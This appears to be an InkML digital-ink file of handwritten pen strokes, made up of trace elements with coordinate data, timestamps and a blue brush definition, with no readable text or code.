  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="21250">12356 3972,'47'-14,"-45"5,-2 9,0 0,-29-25,29 25,-59-16,-7 20,66-4,-45 41,24 19,37-10,28-19,-1-26,4-31,-4-16,-14 4,-18 32,-1 50,2 41,-11-2,-6-16,4-47</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="21627">12911 3873,'-17'-18,"-48"12,65 6,-86 13,2 31,35 30,61 18,54-13,32-23,0-38,-29-36,-20-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="22055">13286 3690,'-21'1,"-32"28,53-29,-53 56,32 6,29-10,36-12,21-13,1-7,-8 5,-23 13,-36 5,-36-3,-34-18,-20-20,15-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="22713">14625 3357,'-35'59,"-24"29,-21 13,1 23,13 2,35-11,13-39,-3-37,-13-38</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23170">14579 3954,'29'-8,"-9"3,-20 5,0 0,42-14,-42 14,48-29,-7-18,-17-6,-21 20,-23 23,-26 22,-29 22,6 14,42 22,54 12,43-14,15-25,9-39,-9-38</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23420">15117 3398,'3'92,"-16"42,-6 16,7-32,21-20,19-31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23624">15216 3809,'-34'0,"-38"5,72-5,-77 4,13-10,33 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23937">15539 3773,'5'10,"-53"7,48-17,-92 14,14 14,53 17,68 11,55 7,17-27,-11-30,-17-35,-39-25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24249">16220 3156,'21'33,"-43"61,22-94,-53 155,-9 13,4 8,21-23,11-35,9-37,22-32,10-41</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24787">16569 3977,'5'48,"-21"41,3 17,2-8,12-23,8-43,-2-43,-4-75,-3-44,-3-35,27 4,12 69,28 66,9 55,-17 37,-27 30,-48 13,-19-40,-34-32,-26-36,20-24,43-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="25181">17055 3877,'6'-5,"-44"8,38-3,0 0,-48 43,48-43,-34 64,36 8,30-16,7-29,-2-40,-16-42,-4-24,-10 17,6 47,8 42,2 42,-6 3,-5-17,1-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="25588">17499 3713,'-7'2,"-37"21,44-23,-67 38,4-4,30-3,30-7,31-6,1-11,14-6,12 6,-17 23,-9 26,-35 0,-26-14,-24-26,-6-21,11-18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26008">17799 3678,'-34'5,"-21"16,55-21,-53 26,16 10,29-7,22-3,25-2,1-9,-5 4,-14 4,-10 16,-33 4,-10-3,-9-18,-13-18,12-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26474">17911 3844,'34'57,"-1"1,-33-58,24 29,4-19,10-24,-3-31,-1-10,-10 3,-10 37,22 39,13 48,2 1,0-24,-20-36,-8-46,-12-40,0-30,-1 27,10 21,20 29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26961">18947 3812,'-10'-12,"-36"-21,46 33,-87-31,-5 33,8 40,41 33,57 3,30-9,2-49,9-47,-1-55,-15-48,-8-33,-34-4,-14 32,8 49,6 68,12 64,9 98,8 47,5-11,1-43,4-43,14-51</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27741">20488 3995,'11'7,"-23"-8,12 1,0 0,0 0,-40-2,40 2,0 0,-67-13,67 13,-81-25,-12-17,-5-30,17-12,12-39,7-42,0-11,37-14,36 0,32 46,38 63,-2 59,-6 55,-17 59,-47 51,-46 25,-47 13,-7-14,22-13,19 1,33-28,35-33,47-52,32-31,30-67,14-81,-41-12,-45 36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43219">5665 5753,'3'-1,"-4"10,1-9,0 0,-2 57,2-57,-9 78,-1 37,30 29,30 7,20-36,-1-46,5-35,-2-52,10-66,3-45,-34-21,-36 34,-27 21,-33 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43836">6810 5888,'-11'-12,"-32"-7,43 19,0 0,-63 3,63-3,-71 23,-3 27,38-2,42-8,41-4,33-3,7 4,2 24,-30 26,-53-6,-46-14,-57-29,-43-30,29-21,64-8,44-19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44238">7039 6325,'98'-5,"-41"-20,-47-17,2-3,10-11,9-10,0 2,-6 14,-29 18,-11 24,-38 20,-29 23,11 21,41 11,50 11,44-1,26-17,17-13,6-18,-13-11,-22-8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44468">7700 6367,'2'-29,"4"-17,-6 46,-12-77,17-19,26-7,35 8,23 16,21 20,3 28,-22 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="57756">9129 6033,'-12'2,"-73"7,85-9,-100 20,-12-3,-1-7,17-14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="58057">9037 5347,'50'14,"-2"65,-48-79,49 155,-1 32,8 12,-6-28,-14-35,-8-33,-16-46</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="58423">9543 6279,'85'20,"12"0,0-10,-14-25,-22-29,-42-34,-41-9,-32 37,1 35,3 52,15 36,26 17,24-4,37-17,22-30,12-35,8-44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="58903">10263 5812,'28'12,"2"49,-30-61,65 120,-2 9,-10-19,1-43,2-45,-13-49,-16-47,-12-38,-3-7,0 43,14 43</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="59252">11086 5957,'59'-29,"-28"-10,-31 39,-7-38,-37 17,-26 25,-7 34,6 33,30 17,44 6,39-19,38-17,15-35,16-33,-12-33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="59521">11582 5235,'8'133,"-14"66,8 18,14-10,16-9,8-13,-16-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="60002">8275 7190,'36'-12,"-23"34,-13-22,0 0,6 64,-6-64</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="60151">8433 7914,'19'60,"-19"-11,0-49,3 45</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="60324">8462 8345,'19'18,"-16"13,-3-31,0 0,0 0,3 26,-3-26,0 0,16 23,-16-23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="61019">8754 9036,'-25'-18,"-34"8,59 10,-74 18,-1 27,18 26,25 23,28 20,48 18,22 16,-15-4,-19-10,-32-26,-38-33,-34-33,-18-35,4-32,39-19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="61306">8821 9647,'-24'5,"-29"10,53-15,-73 17,18-1,11 5,-10 5,-8-1,1-5,8-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="61700">9090 9727,'-7'28,"-34"25,41-53,-40 63,16 1,49-11,38-23,11-30,-16-26,-22-35,-28-17,-32 19,-12 29,-9 14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="62158">9293 9993,'34'61,"-13"35,1 6,-9-13,-1-29,1-38,-2-37,-22-58,-24-47,5-20,11-10,18 13,20 37,26 51,30 59,1 56,-40 29,-36-9,-36-21,-39-23,-15-27,27-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="62494">9531 9901,'114'-7,"-6"-7,-26-25,-25-26,-43-14,-47 0,-32 31,7 48,7 47,8 12,36 15,36-3,31-9,24-20,14-29,-8-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="62861">10188 9653,'61'62,"-37"3,1-9,-11-20,-4-28,0-34,0-37,1-25,23-24,16 40,14 55,18 53,-13 24,-10 11,-11-11,-8-28,3-43</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="63162">11245 8537,'-40'26,"-37"59,-6 55,14 40,38 31,52 6,30-22,18-38,-10-58,1-66</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="63371">11691 9429,'6'-8,"0"4,-6 4,0 0,5-4,-5 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="63521">12100 9463,'93'-2,"-44"-9,-14-5,-12-11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="63689">12817 9420,'66'-12,"-28"1,-38 11,23-21,3-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="64106">13681 8301,'69'57,"18"56,18 49,7 42,-35 15,-54 7,-44 6,-52-17,-65-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="99872">11230 10418,'26'30,"-23"21,-3-51,-4 52,10-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="100054">11526 10980,'7'5,"-8"-1,1-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="100262">12362 11072,'121'7,"-12"-5,-8-10,-7-9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="100410">13448 11048,'137'-5,"-77"-3,-9-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="100811">14382 11129,'26'-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="102357">14400 10804,'1'-6,"4"2,-5 4,0 0,0 0,4-1,-4 1,0 0,0 0,0 0,-2 6,-10 10,12-16,0 0,0 0,-29 24,29-24,0 0,-37 30,37-30,-40 34,19-9,21-9,17-4,13-6,9 0,13 14,10 18,-25 3,-27-9,-26-7,-38-10,-31-7,-2-2,15 3,32 2,27-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="102843">14567 10936,'-14'28,"23"27,-9-55,21 61,17-16,13-25,-1-30,-20-25,-13-15,-11 3,-1 15,-5 25,9 18,11 38,9 38,-5 35,-13 5,-4-45,-12-46,0-35,-7-36,-4-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="103238">15157 10966,'47'-21,"-35"6,-12 15,0 0,0 0,0 0,-16-7,16 7,0 0,0 0,-34 20,34-20,0 0,-44 38,44-38,-40 49,23-12,27-16,27-13,23-4,11-3,-11 10,-23 19,-37 6,-40 1,-28-14,-6-7,22-11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="103669">15365 10436,'21'80,"-2"36,13 26,0 14,2-32,-7-36,2-34,-5-30,-1-35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="103840">15593 11039,'-53'-21,"-50"6,-22 3,14 9,51 12,36 5,42-3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="104204">15727 11080,'21'-13,"-4"-2,-17 15,0 0,0 0,28-24,-28 24,0 0,34-34,-34 34,33-40,-18-1,-27 9,-22 22,-16 29,12 28,20 9,32 4,49-9,25-12,3-20,-25-25,-30-30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="104693">16021 10992,'19'36,"19"14,-38-50,35 44,-3-16,-9-19,-10-28,-12-28,4-13,18 4,16 26,10 40,0 25,-6 9,-23-14,-14-21,-5-24,0-23,17-10,23 6,9 23,5 31,-12 40,-13 12,-4 14,-8-24,3-24,23-25,16-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="105011">17495 10915,'-23'-27,"-41"13,64 14,-84-3,3 32,31 25,37 7,41-7,37-11,21-16,10-10,-19-22,-1-19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="105440">17830 10915,'-14'-12,"-27"9,41 3,0 0,-45 14,45-14,-41 38,14 16,22-1,20-13,18-15,5-25,-4-20,-13-35,-6-10,-13 26,1 33,-1 35,2 36,5 14,7 6,6-35,4-38,-10-60,-13-44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="105713">17954 10401,'28'75,"13"44,-13 33,-20 7,8-17,5-38,-3-29,12-40,-2-22,-1-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="106146">18234 10337,'11'3,"1"48,-12-51,11 102,-14 33,-2 10,11-16,10-29,6-26,13-19,-3-8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="106617">18862 10971,'19'6,"13"-1,-32-5,0 0,61 6,-61-6,79 0,11-3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="106771">19605 10966,'73'-12,"-3"1,-4 1,-2-10,-6 3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="106908">20159 10825,'69'-13,"-1"-11,-15-3,-6-3,-6-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="107060">20542 10361,'29'-72,"-18"-11,-16-14,-6-14,5-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="107578">20596 9144,'7'-17,"2"14,-9 3,0 0,13 6,-13-6,14 21,2 17,-16-38,33 54,6 5,8 14,-15 3,2-10,-19-13,-13-49,-14-42,-22-45,-7-33,-16-1,-13 24,-8 35,-16 52,-22 35,-1 17,2 7,31-5,24-24,12-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="108390">20727 10539,'3'-5,"0"12,-3-7,0 0,15 46,-15-46,3 86,-10 15,2-13,2-27,7-26,-3-30,-1-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="108876">20926 10937,'-10'-15,"4"-38,6 53,-8-67,4-11,1 1,2 44,9 32,14 45,12 52,3-9,12-25,-12-50,2-37,-19-39,-13-9,0-1,-5 23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="109115">21379 10487,'22'24,"-1"29,-21-53,11 99,-7 26,6 2,-3-50,9-31,2-37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="109355">21552 10491,'-19'6,"-32"-4,51-2,-84 24,6 2,23 2,16 10,33-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="109811">21618 10837,'18'-25,"20"-18,-38 43,38-50,-4-1,-14 11,-23 6,-14 17,-20 28,-6 18,0 14,7 10,37 10,25-2,15-9,19-10,8-35,-22-11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="110038">21913 10936,'5'-13,"7"-12,-12 25,0 0,9-60,-9 60,16-60,10 4,5-2,5 7,-3 31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="110326">22156 10879,'12'46,"13"-30,-25-16,0 0,0 0,20-2,-20 2,0 0,18-52,-18 52,7-71,2-15,5 6,15 28,8 2,5 38,8 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="110613">22437 10698,'7'78,"29"-12,7-15,50-64,-59-18,-19-33,-3-14,-13 16,4 36,-7 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="111058">22816 10940,'15'137,"-12"7,4-53,-1-40,-6-47,-11-46,-6-56,-5-55,8 3,23-2,20 71,12 61,6 27,-7 56,-28 31,-28 7,-24-36,-11-34,9-33,36-53</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="111283">23125 10243,'18'64,"-31"58,-4 21,5 4,13-41,17-44,12-38</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="111465">23227 10615,'-59'24,"-23"-29,-23 1,0-15,6 10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="112987">18063 6600,'-12'-77,"5"36,7 41,0-20,9 28,-4 33,-12 65,2 45,0 61,-16 34,-5 2,-17-17,7-19,26-29,25-25,17-31,6-32,15-27,34-33,29-11,34 3,19-10,32-8,37-6,32 8,41-11,34 0,34 28,8 12,6-9,-37 0,-16-28,-20-4,-17-1,-27 22,-47 5,-63-2,-60-36,-49 7,-24-10,-13-23,-10-7,1-41,0-50,15-39,23-44,0-21,12 9,2-7,-14-12,-21 51,-13-15,-18 66,-12 33,-16 58,-29 20,-60 22,-46 19,-54 12,-60-15,-82-11,-44 6,-46-12,-25 9,-20 4,2 18,-10 13,48-2,74 6,75-12,78 0,81-4,70 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="113531">19015 5589,'3'84,"-14"34,-11 14,-9-19,20-32,12-21,18-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="113857">19227 5799,'12'5,"-35"22,23-27,0 0,-54 32,54-32,-82 33,18 3,24 6,33-12,20 7,15-14,20 10,-3 12,-2-4,-11-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="114252">19247 6130,'47'-19,"6"-4,-53 23,63-38,-1-9,-30-5,-23 26,-9 14,-25 18,-21 9,-8 26,24 14,30 1,39-1,11-4,15-16,-9-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="114450">19740 6240,'4'-32,"-7"-23,3 55,-1-69,5-7,19 11,6 8,11 24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="114850">19977 5849,'28'28,"-26"33,-2-61,-8 74,1 4,11-5,11-31,7-22,2-41,-6-33,3-20,13-5,13 13,3 26,-3 49,-12 46,-9 16,-23 14,-14-22,3-20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="115219">20402 6131,'48'3,"-11"-9,-37 6,0 0,40-12,-40 12,47-25,-14-20,-22-11,-30-6,-13 40,-1 25,-1 34,12 5,20 16,25 8,29-7,20-17,11-29,4-31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="115475">20958 5362,'25'44,"-16"54,-11 48,6 25,-5 11,6-9,-2-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="127342">17988 7068,'-7'1,"-36"-8,43 7,0 0,-67-11,67 11,-95-13,5 10,-2 3,-6 3,-24 4,-32-7,-14 3,5 2,15 2,6 0,5-7,-14-9,-30-6,2-5,7 4,45 10,54 10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="128871">14516 6674,'-5'-9,"-10"5,15 4,0 0,0 0,-31-4,31 4,0 0,-49-5,49 5,-61 6,-16 13,-1 20,17 12,19 16,7 18,15 10,9-5,20-19,3-35,5-54,11 54,6-29,36-11,22-10,-4-10,-31 25,-17-17,-15 5,-21-29,-16-48,-30-27,-24-14,1 45,-7 52,6 22,26 25,6 22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="130024">14155 6960,'-23'-11,"-4"3,27 8,0 0,0 0,-12 10,12-10,0 0,-4 40,4-40,4 58,0-7,7-34,5-13,6-31,-6-12,-9 4,-1 3,-6 24,-6 9,-8 17,9 17,16 9,29-9,13-18,-10-24,-26-33,-33-23,-40-3,-17 19,4 25,29 22,31 17,44 34,26 10,-1-13,-9-29,-16-31,-31-30,-35-9,-11 8,-5 35,10 30,27 26,23-8,1-16,1-31,-25-31,-26-30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="130557">14323 6408,'26'19,"24"32,-50-51,47 69,-18-8,-6-7,-21-29,-13-26,-48-52</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="131034">14233 6446,'30'27,"6"22,-36-49,18 58,-12-7,-12-21,-21-27,-29-35,-13-17,11 3,30 18,26 24,14 23,13 30,-23-3,-16-8,-8-39,-38-36,2-9,-3 5,15 23,22 29,10 32,6 5,2-14,6-28,1-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="131600">14041 6220,'21'18,"41"34,-62-52,89 79,39 26,27 5,2-34,-12-12,-42-13,-55-10,-25-4,-25-19,-15-8,-14-8,12-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="131891">15104 6983,'-22'21,"-35"12,57-33,-94 45,-35 17,-18 13,2 16,12-20,21-15,38-10,40-9,29-12,14-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="133134">13641 6941,'14'-13,"-12"10,-2 3,0 0,0 0,-8 2,8-2,0 0,-31 12,31-12,-59 28,-25 19,-43 25,7 3,16-2,11-1,8 7,29-1,29 12,29 7,15-25,3 1,-7-12,-13 1,-16 6,0-10,-4-12,10-15,4-18,5-11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="133633">13006 8098,'18'-13,"0"0,-18 13,0 0,27-26,-27 26,31-48,12-18,2-4,-2 6,-22 27,-17 29,-24 21,-40 20,-24 7,-16 3,1 7,16-18,20 11,11-49,-13-37,-9-31,-6-31,-12-13,-7 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="144449">3378 7993,'4'-5,"1"3,-5 2,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,7 11,-7-11,0 0,15 40,-15-40,15 55,-6 15,3 9,13-11,6-4,3-21,-6-30,20-28,22-36,-5-35,-13-25,-22 17,-32 48,-25 24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="145023">3984 7978,'1'1,"1"34,-2-35,0 0,20 72,-20-72,11 84,5-7,-1-15,-4-33,-8-22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="145206">3904 7887,'-3'-17,"-11"-2,14 19,0 0,0 0,-8-13,8 13,0 0,-1-8,1 8,9-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="145919">4656 7954,'-31'-13,"-6"14,37-1,0 0,-51 14,51-14,-69 27,-9 19,13 35,29-14,36-8,26-8,22-31,5-18,1-32,-9-32,-14-38,-10-48,-16 32,-31 23,-10 25,-1 28,19 21,18 34,27 50,15 47,6 39,-2 6,-10-35,1-34,-12-42,-22-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="147264">3857 8156,'3'3,"6"20,-9-23,0 0,1 50,-1-50,6 60,-1-5,-5-5,20-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="155245">5594 3984,'17'-11,"-29"7,12 4,0 0,-61-1,61 1,-115 14,-61 28,-11 19,-4 35,18 21,-11 30,4 17,21 31,19 15,30 8,36 7,43 9,39-8,13-7,-7-37,-6-31,6-28,-10-29,0-14,-11-14,-8-21,6-24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="155701">3851 6888,'24'-3,"-8"-4,-16 7,0 0,0 0,19-19,-19 19,0 0,22-32,-22 32,34-41,0-18,0-4,-5 1,-18 17,-8 38,-4 8,-15 39,-16 8,-11 5,-16-4,-6-27,-4-18,-6-33,-5-22,-10-17,-4-15,23 27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="157209">5699 7912,'-42'-6,"-37"0,79 6,-91 10,4 6,2-3,13 1,16-7,22-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="157479">5709 8178,'1'-9,"-46"3,45 6,0 0,-61 3,61-3,-73 3,-6 1,10 4,6-4,8-8,13-3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="158053">6412 7601,'-21'8,"-38"24,59-32,-71 51,8 16,6 10,18 6,21 8,31-6,28-14,21-22,15-26,18-31,9-38,-14-37,-21-53,-35 0,-44 38,-27 25,-46 12,-31 33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="172691">13590 6486,'-3'0,"-19"7,22-7,0 0,-42 7,42-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="172838">12951 6728,'-114'42,"-26"-11,-16-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="172990">11446 7045,'-140'-12,"-62"12,-6 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="173154">9394 7280,'-128'9,"-20"18,-5 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="173319">8063 7467,'-83'2,"13"9,6 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="173455">7400 7584,'-39'-5,"10"6,29-1,0 0,-24 5,24-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="173979">7350 7301,'-14'13,"-12"7,26-20,0 0,-30 23,30-23,-39 29,-1 6,0 1,11 2,4-3,9-11,13 5,15-5,16-8,21 4,-9-8,23 10,25 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="191476">11311 6705,'-61'-9,"-29"3,-33 6,-35-3,-18-1,-16 7,-3-3,-24-2,-9-5,-3-1,2 13,14 9,-5 6,-19-3,-27-5,-5-4,-13-1,-12 0,-18 2,-4 2,-2 2,17 11,19 7,39 10,36 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="193848">22814 906,'74'-30,"0"21,32 19,47 36,49 30,39 33,-3 30,-16 47,-21 54,-31 69,-13 43,-40 37,-70 1,-68 4,-60-46,-47-22,-54-55,-58-62,-26-64,-36-52,-25-56,-19-81,5-90,11-47,32-58,24-34,37-35,41-18,70 3,81-24,60 27,51 16,22 26,21 16,29 7,27 11,36 70,67 84,55 102,0 68,-76 23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="194773">23160 1748,'123'36,"-20"9,-4 30,4 41,21 28,26 43,-1 47,-8 7,-44 21,-44 6,-60-15,-50-9,-37-15,-31-55,-34-24,-36-64,-15-48,-22-72,-21-39,-9-66,14-46,9-26,49-32,44-20,47-11,26-16,45 3,37 18,53 46,60 52,65 36,26 32,6 40,3 24,-23 42,-49 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="195935">18101 2969,'33'-6,"-14"-10,-19 16,0 0,36-59,-36 59,48-100,4-36,38-28,27-8,15-8,5 2,13 10,31 34,26 36,37 27,22 43,15 30,-7 33,-29 9,-58-11,-61-10,-49-8,-30 9,-28-9,-13-4,-6 9,-29 39,-32 11,-5 4,-1-8,16-22,25-29,24-13,9-14,28-65,21-31,-13 17,-13 12,-10 30,-16 16,-19 1,-36-13,-40-15,6-7,23 21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="196943">21744 1292,'20'-8,"-6"-4,-14 12,0 0,0 0,20-12,-20 12,0 0,27-7,-27 7,51 6,0 17,-24 3,-39 9,-19 10,-23-11,-4-22,5-9,23-2,24-3,16 7,47 26,22 28,-10 18,-33-9,-47-30,-47-18,-61-44,-13 3</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7:43:00.683"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">5511 5933,'-21'-7,"0"3,21 4,0 0,0 0,-23 1,23-1,0 0,-28-1,28 1,-37 4,-8 0,-11 4,-16-5,-8-8,-9 6,4 3,5-2,4-2,6 4,-8-4,-3-7,-16 6,-8-11,4 15,1-4,8-2,6 4,10-13,9 2,-4 8,-5-1,6-6,5 11,-5-14,-18 5,1 2,13 4,32 11,38 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3363">5144 7120,'0'0,"1"8,-1-8,0 0,0 0,19 21,-19-21,0 0,44 18,-44-18,69 25,17-4,12-1,14-1,3-11,3-2,13-2,-5-2,-5-11,-4-2,-2-5,-9 2,-2 7,-9 1,-10 18,-11-5,-23 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4636">4812 2450,'-15'-4,"-2"2,17 2,0 0,0 0,0 0,0 0,-26-5,26 5,0 0,0 0,0 0,-22 4,22-4,0 0,0 0,-27-1,27 1,0 0,-23 9,23-9,-36 4,-31 12,-42-4,-21-1,-10-1,-7-4,-16 1,-22 9,-21-2,3-13,7-9,8 3,7-16,16 5,5-10,36 18,33 1,19 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="45858">10782 1466,'8'-26,"6"-3,-14 29,0 0,29-34,-29 34,50-25,9 22,23 26,2 23,-27 8,-36 12,-28-2,-32-1,-18-6,8 0,19 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="46022">11174 2386,'0'-3,"6"-5,-6 8,0 0,2-9,-2 9</inkml:trace>
